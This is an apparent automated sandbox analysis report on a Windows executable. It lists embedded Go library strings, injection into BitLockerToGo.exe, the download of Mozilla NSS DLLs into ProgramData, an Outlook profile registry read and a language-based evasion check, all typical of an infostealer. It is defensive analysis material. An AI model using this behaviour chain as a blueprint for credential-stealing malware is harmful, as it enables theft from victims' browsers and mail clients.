                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Program.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Operand.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.Operands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Instruction.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Add.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Double.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.Shift.String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Operand
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Operand).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).Operands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Instruction).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).Output
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Program).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Add).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Double).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Clone
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).Inputs
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ir.(*Shift).String
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ir.Instruction
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.AssertionFailure
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Linef
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).NL
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Printf
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).SetError
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.NewTabWriter
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.New
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.Printer
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/internal/print.TabWriter
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.Identifier.Precedence
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/ast.(*Identifier).Precedence
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/acc/ast.Statement
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryValues
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameOperands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.NameBinaryRuns
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.NameOperands.func4
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryRuns.func2
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.NameOperands.func3
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.init.NameBinaryValues.func1
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Compile
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/errutil.UnexpectedType
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Eval
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Func.Execute
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Concat
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.Exec.Concat.func1
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.CanonicalizeOperands
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/acc/pass.(*Func).Execute
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/bigvector.init
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.init
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).CheckCitable
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).IsRelease
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTime
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Title
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func2
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).WriteCitation.func1
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).RepositoryURL
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Module
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).DOIURL
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.doiurl
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*TabWriter).Flush
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/internal/print.(*Printer).Error
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).Citation
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseTag
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ReleaseURL
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain/meta.(*Properties).ConceptDOIURL
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: type:.eq.github.com/mmcloughlin/addchain/meta.Properties
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: net/addrselect.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigint/bigint.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigints/bigints.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/chain.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/program.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ir/ir.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/errutil/errutil.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/print/printer.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/ast/ast.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/naming.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/eval.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/acc/pass/pass.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/internal/bigvector/bigvector.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/meta.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/mmcloughlin/addchain@v0.4.0/meta/cite.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/decred/dcrd/dcrec/secp256k1/v4@v4.0.1/loadprecomputed.go
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeFile read: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe "C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe"
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic file information: File size 15184384 > 1048576
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x663600
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x758000
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                      Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                      Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                      Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                      Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                      Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_02769860
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: section name: .symtab
                      Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                      Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0276B035 push ecx; ret 1_2_0276B048
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C82B536 push ecx; ret 1_2_6C82B549
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02769860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_02769860
                      Source: C:\Users\user\Desktop\5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-64616
